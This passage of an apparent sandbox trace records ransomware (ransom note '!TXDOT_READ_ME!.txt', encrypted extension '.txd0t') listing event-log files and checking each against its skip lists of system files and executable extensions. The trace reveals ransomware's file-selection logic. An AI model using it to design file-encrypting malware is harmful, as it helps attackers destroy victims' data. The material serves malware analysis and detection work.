psz2=".txd0t") returned -1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="bootsect.bak") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="iconcache.db") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="thumbs.db") returned -1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=" ransomware ") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=" ransom ") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="debug.txt") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="boot.ini") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="desktop.ini") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="autorun.inf") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="ntuser.dat") returned -1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="ntldr") returned -1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="ntdetect.com") returned -1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="bootfont.bin") returned 1 [0071.969] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.969] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned=".evtx" [0071.969] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.969] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.969] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.969] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.969] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.969] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.969] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.970] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0071.970] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=".") returned 1 [0071.970] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="..") returned 1 [0071.970] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.970] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.970] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" [0071.970] PathFindExtensionW (pszPath="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned=".evtx" [0071.970] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="bootsect.bak") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="iconcache.db") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="thumbs.db") returned -1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=" ransomware ") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=" ransom ") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="debug.txt") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="boot.ini") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="desktop.ini") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="autorun.inf") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="ntuser.dat") returned -1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="ntldr") returned -1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="ntdetect.com") returned -1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="bootfont.bin") returned 1 [0071.970] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.970] PathFindExtensionW (pszPath="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned=".evtx" [0071.970] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.970] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.970] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.970] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.970] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.970] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.970] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.970] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0071.970] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2=".") returned 1 [0071.971] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="..") returned 1 [0071.971] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.971] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.971] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Winlogon%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" [0071.971] PathFindExtensionW (pszPath="Microsoft-Windows-Winlogon%4Operational.evtx") returned=".evtx" [0071.971] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2=" ransom ") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="debug.txt") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="boot.ini") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="ntldr") returned -1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.971] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.971] PathFindExtensionW (pszPath="Microsoft-Windows-Winlogon%4Operational.evtx") returned=".evtx" [0071.971] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.971] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.971] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.971] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.971] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.971] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.971] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.971] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0071.971] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=".") returned 1 [0071.971] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="..") returned 1 [0071.971] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.972] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.972] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WMI-Activity%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" [0071.972] PathFindExtensionW (pszPath="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned=".evtx" [0071.972] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=" ransom ") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="debug.txt") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="boot.ini") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="ntldr") returned -1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.972] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.972] PathFindExtensionW (pszPath="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned=".evtx" [0071.972] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.972] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.972] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.972] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.972] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.972] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.972] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.972] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0071.972] StrCmpW (psz1="Security.evtx", psz2=".") returned 1 [0071.972] StrCmpW (psz1="Security.evtx", psz2="..") returned 1 [0071.972] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.972] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.972] StrNCatW (in: psz1="C:\\Logs\\", psz2="Security.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Security.evtx") returned="C:\\Logs\\Security.evtx" [0071.972] PathFindExtensionW (pszPath="Security.evtx") returned=".evtx" [0071.973] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2="bootsect.bak") returned 1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2="iconcache.db") returned 1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2="thumbs.db") returned -1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2=" ransomware ") returned 1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2=" ransom ") returned 1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2="debug.txt") returned 1 [0071.973] StrCmpIW (psz1="Security.evtx", psz2="boot.ini") returned 1 [0072.022] StrCmpIW (psz1="Security.evtx", psz2="desktop.ini") returned 1 [0072.022] StrCmpIW (psz1="Security.evtx", psz2="autorun.inf") returned 1 [0072.022] StrCmpIW (psz1="Security.evtx", psz2="ntuser.dat") returned 1 [0072.022] StrCmpIW (psz1="Security.evtx", psz2="ntldr") returned 1 [0072.022] StrCmpIW (psz1="Security.evtx", psz2="ntdetect.com") returned 1 [0072.022] StrCmpIW (psz1="Security.evtx", psz2="bootfont.bin") returned 1 [0072.023] StrCmpIW (psz1="Security.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.023] PathFindExtensionW (pszPath="Security.evtx") returned=".evtx" [0072.023] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0072.023] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0072.023] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0072.023] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0072.023] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0072.023] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0072.023] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0072.023] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0072.023] StrCmpW (psz1="Setup.evtx", psz2=".") returned 1 [0072.023] StrCmpW (psz1="Setup.evtx", psz2="..") returned 1 [0072.023] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0072.023] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0072.023] StrNCatW (in: psz1="C:\\Logs\\", psz2="Setup.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Setup.evtx") returned="C:\\Logs\\Setup.evtx" [0072.023] PathFindExtensionW (pszPath="Setup.evtx") returned=".evtx" [0072.023] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="bootsect.bak") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="iconcache.db") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="thumbs.db") returned -1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2=" ransomware ") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2=" ransom ") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="debug.txt") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="boot.ini") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="desktop.ini") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="autorun.inf") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="ntuser.dat") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="ntldr") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="ntdetect.com") returned 1 [0072.023] StrCmpIW (psz1="Setup.evtx", psz2="bootfont.bin") returned 1 [0072.024] StrCmpIW (psz1="Setup.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.024] PathFindExtensionW (pszPath="Setup.evtx") returned=".evtx" [0072.024] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0072.024] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0072.024] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0072.024] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0072.024] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0072.024] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0072.024] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0072.024] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0072.024] StrCmpW (psz1="System.evtx", psz2=".") returned 1 [0072.024] StrCmpW (psz1="System.evtx", psz2="..") returned 1 [0072.024] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0072.024] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0072.024] StrNCatW (in: psz1="C:\\Logs\\", psz2="System.evtx", cchMax=1040 | out: psz1="C:\\Logs\\System.evtx") returned="C:\\Logs\\System.evtx" [0072.024] PathFindExtensionW (pszPath="System.evtx") returned=".evtx" [0072.024] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="bootsect.bak") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="iconcache.db") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="thumbs.db") returned -1 [0072.024] StrCmpIW (psz1="System.evtx", psz2=" ransomware ") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2=" ransom ") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="debug.txt") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="boot.ini") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="desktop.ini") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="autorun.inf") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="ntuser.dat") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="ntldr") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="ntdetect.com") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="bootfont.bin") returned 1 [0072.024] StrCmpIW (psz1="System.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.024] PathFindExtensionW (pszPath="System.evtx") returned=".evtx" [0072.024] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0072.025] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0072.025] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 